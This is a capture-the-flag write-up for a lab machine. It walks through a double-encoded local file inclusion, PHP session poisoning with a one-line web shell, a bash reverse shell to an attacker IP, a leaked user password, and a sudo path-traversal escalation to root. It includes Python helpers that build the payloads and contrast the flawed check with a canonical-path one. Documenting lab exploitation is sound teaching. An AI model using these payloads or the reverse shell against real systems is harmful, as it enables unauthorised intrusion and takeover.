Evasion Writeup
Author: Gabriel Silva (@gabriel-silva-509347165)

Port Scanning
nmap -sV -sC -p- -v $IP --min-rate 3000

Only ports 22 (SSH) and 80 (HTTP) are open.
Enumeration
Browsing to port 80 redirects to the virtual host evasion.hc, which does not resolve on its own.

Add the hostname to /etc/hosts so that it resolves to the target IP:
sudo vim /etc/hosts

With the name resolving, the application on port 80 lets us register a new user and log in.


The application includes files by path, and a double-URL-encoded traversal (the % of every percent-encoded byte is itself encoded as %25) is accepted and decodes on the server to ../../../../../etc/passwd, reading the file through the LFI:
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%2565%2574%2563%252f%2570%2561%2573%2573%2577%2564

Our PHPSESSID cookie names a PHP session file, /var/lib/php/sessions/sess_0n9720fs19remri8e0h26gb5bq, which the LFI can read. Because the session file stores data we supply at registration, it can be poisoned with PHP code (this is session poisoning, not log poisoning).

To poison the session, register a new user with a PHP web shell as the username (the login field):
<?php system($_GET[0]); ?>

Log in as that user, intercept the request, and include the new session file through the LFI. The stored username is executed as PHP, with the command taken from the 0 query parameter. The session ID changes with each login, so the path must use the current PHPSESSID:
../../../../../var/lib/php/sessions/sess_p3eqpujc8mqhqnu9agu96bh8om
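The double-encoded traversal from the Enumeration step and the session-file include above, as an added example (not the author's code): the script builds both payloads, models a filter that decodes once against an include that decodes twice, and shows what the poisoned session record looks like. Assumed, because the page does not show them: that the filter URL-decodes the parameter once, that the application decodes it a second time before include(), the session key name username, and PHP's default php serialize handler.

```python
"""Payload helpers for the double-encoded LFI and the PHP session poisoning
described above. Added example, not the author's code. Assumptions: the
filter decodes the parameter once before checking it and the application
decodes it again before include(); the session key "username" and the
'php' serialize handler are guesses, since the page does not show the
session contents."""
from urllib.parse import unquote

SESSION_DIR = "/var/lib/php/sessions"   # PHP's default session.save_path on Debian
WEBSHELL = "<?php system($_GET[0]); ?>"


def double_encode(path: str) -> str:
    """Percent-encode every byte, then encode the '%' signs again.
    '../etc' -> '%252e%252e%252f%2565%2574%2563'"""
    once = "".join(f"%{b:02x}" for b in path.encode())
    return once.replace("%", "%25")


def naive_traversal_filter(param: str) -> bool:
    """Model (assumed) of a filter that decodes once and rejects traversal.
    Returns True when the request would be blocked."""
    decoded = unquote(param)
    return "../" in decoded or decoded.startswith("/")


def app_include_target(param: str) -> str:
    """Model (assumed) of the vulnerable include: the server decodes the
    query string, then the application decodes the value a second time."""
    return unquote(unquote(param))


def session_file(phpsessid: str) -> str:
    """PHP's files handler stores session <id> as sess_<id> in save_path."""
    return f"{SESSION_DIR}/sess_{phpsessid}"


def php_session_record(key: str, value: str) -> str:
    """One string entry in PHP's default 'php' session serialization.
    include() executes whatever sits between <?php ... ?> in the value and
    echoes the rest as text, so the surrounding serialization is harmless."""
    return f'{key}|s:{len(value.encode())}:"{value}";'


def poisoned_include(phpsessid: str, depth: int = 5) -> str:
    """Traversal string that includes the poisoned session file."""
    return "../" * depth + session_file(phpsessid).lstrip("/")


if __name__ == "__main__":
    etc_passwd = double_encode("../../../../../etc/passwd")
    print(etc_passwd)
    print("blocked by single-decode filter:", naive_traversal_filter(etc_passwd))
    print("path included on the server:", app_include_target(etc_passwd))
    print(php_session_record("username", WEBSHELL))   # assumed session layout
    print(poisoned_include("p3eqpujc8mqhqnu9agu96bh8om"))
```

The single-decode filter sees %2e%2e%2f, which contains no ../, while the second decode on the server yields the real traversal; that mismatch between the decoder the check uses and the decoder the include uses is the whole evasion.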

Foothold
With the LFI turned into RCE through the poisoned session file, the 0 parameter can carry a reverse shell. URL-encode the payload when placing it in the query string, since the & and the spaces would otherwise break the request:
bash -c 'exec bash -i &>/dev/tcp/10.0.31.150/1337 <&1'

Start the listener on the attacking host (10.0.31.150) before sending it:
nc -lnvp 1337

Privilege Escalation
Running pspy64 on the box shows a process whose command line contains the credentials of the user lucas:
lucas:TL7g81rqYFW


sudo -l

The output shows that lucas may run /usr/bin/python3 as root without a password on scripts under /opt/scripts/. sudo matches that argument against a glob on the literal string and does not canonicalise it, so a path that begins with /opt/scripts/ but traverses back out of the directory still matches. We therefore drop a script in /tmp that spawns a shell and reference it through /opt/scripts/:
echo "import os" > /tmp/evil.py
echo "os.system('/bin/bash')" >> /tmp/evil.py
sudo /usr/bin/python3 /opt/scripts/../../../tmp/evil.py
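Why the rule is bypassable, as an added example (not the author's code): the permitted argument is matched as a glob against the raw string, so .. components are never resolved. The rule text /usr/bin/python3 /opt/scripts/* is an assumption reconstructed from the command that worked, and the two checks are a model of the behaviour, not sudo's own code; the second one shows the canonicalising check a safer wrapper would apply.

```python
"""Glob matching versus canonical-path matching for the sudo rule above.
Added example, not the author's code. The pattern '/opt/scripts/*' is an
assumed reconstruction of the sudoers entry; neither function is sudo's
own implementation."""
import fnmatch
import os

ALLOWED_DIR = "/opt/scripts"
SUDO_ARG_PATTERN = ALLOWED_DIR + "/*"   # assumed sudoers argument pattern


def allowed_by_glob(script_path: str) -> bool:
    """Model of sudoers argument matching: fnmatch on the raw argument.
    '*' also matches '/', so anything after the prefix is accepted,
    including '..' components that leave the directory."""
    return fnmatch.fnmatchcase(script_path, SUDO_ARG_PATTERN)


def allowed_by_canonical_path(script_path: str) -> bool:
    """Hardened check: resolve symlinks and '..' first, then require the
    result to live strictly under the allowed directory."""
    real = os.path.realpath(script_path)
    base = os.path.realpath(ALLOWED_DIR)
    return os.path.commonpath([real, base]) == base and real != base


def evaluate(script_path: str) -> dict:
    """Side-by-side verdict of both checks for one argument."""
    return {
        "arg": script_path,
        "resolved": os.path.realpath(script_path),
        "glob_allows": allowed_by_glob(script_path),
        "canonical_allows": allowed_by_canonical_path(script_path),
    }


if __name__ == "__main__":
    for p in ("/opt/scripts/backup.py",
              "/opt/scripts/../../../tmp/evil.py",
              "/tmp/evil.py"):
        print(evaluate(p))
```

The legitimate script passes both checks, the traversal passes only the glob, and the bare /tmp path passes neither; a rule without a wildcard, or a wrapper that applies the canonical-path check, closes the hole.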

Proof
